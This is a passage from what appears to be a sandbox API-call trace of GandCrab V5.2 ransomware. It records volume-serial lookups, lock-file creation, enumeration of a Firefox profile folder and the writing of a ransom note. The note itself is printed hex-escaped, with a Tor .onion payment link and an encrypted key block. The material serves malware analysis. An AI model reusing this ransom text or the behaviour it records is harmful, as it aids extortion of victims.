\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0082.314] WriteFile (in: hFile=0x2d4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e590, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e590*=0x2162, lpOverlapped=0x0) returned 1 [0082.315] CloseHandle (hObject=0x2d4) returned 1 [0082.315] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.315] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0082.315] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x1b, wMilliseconds=0x270)) [0082.315] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0082.316] GetWindowsDirectoryW (in: lpBuffer=0x2310000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0082.316] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2310200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2310600, lpMaximumComponentLength=0x2310608, lpFileSystemFlags=0x2310604, lpFileSystemNameBuffer=0x2310400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2310600*=0xd2ca4def, lpMaximumComponentLength=0x2310608*=0xff, lpFileSystemFlags=0x2310604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0082.316] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\d2ca4a09d2ca4deb61a.lock") returned 120 [0082.316] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp-widevinecdm\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2d4 [0082.318] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.318] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.318] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\") returned 96 [0082.318] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\*" [0082.318] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\*", fInfoLevelId=0x1, lpFindFileData=0x259e5ac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e5ac) returned 0x503578 [0082.318] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0082.318] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0082.319] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0082.319] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0082.319] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0082.319] lstrcmpW (lpString1="1.4.8.903", lpString2=".") returned 1 [0082.319] lstrcmpW (lpString1="1.4.8.903", lpString2="..") returned 1 [0082.319] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\", lpString2="1.4.8.903" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903" [0082.320] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\" [0082.320] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0082.320] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0082.320] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0082.320] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0082.320] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0082.320] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0082.320] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0082.321] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0082.321] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0082.321] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.321] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0082.321] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\\\TITWMVJL-DECRYPT.txt") returned 127 [0082.321] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x248 [0082.329] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b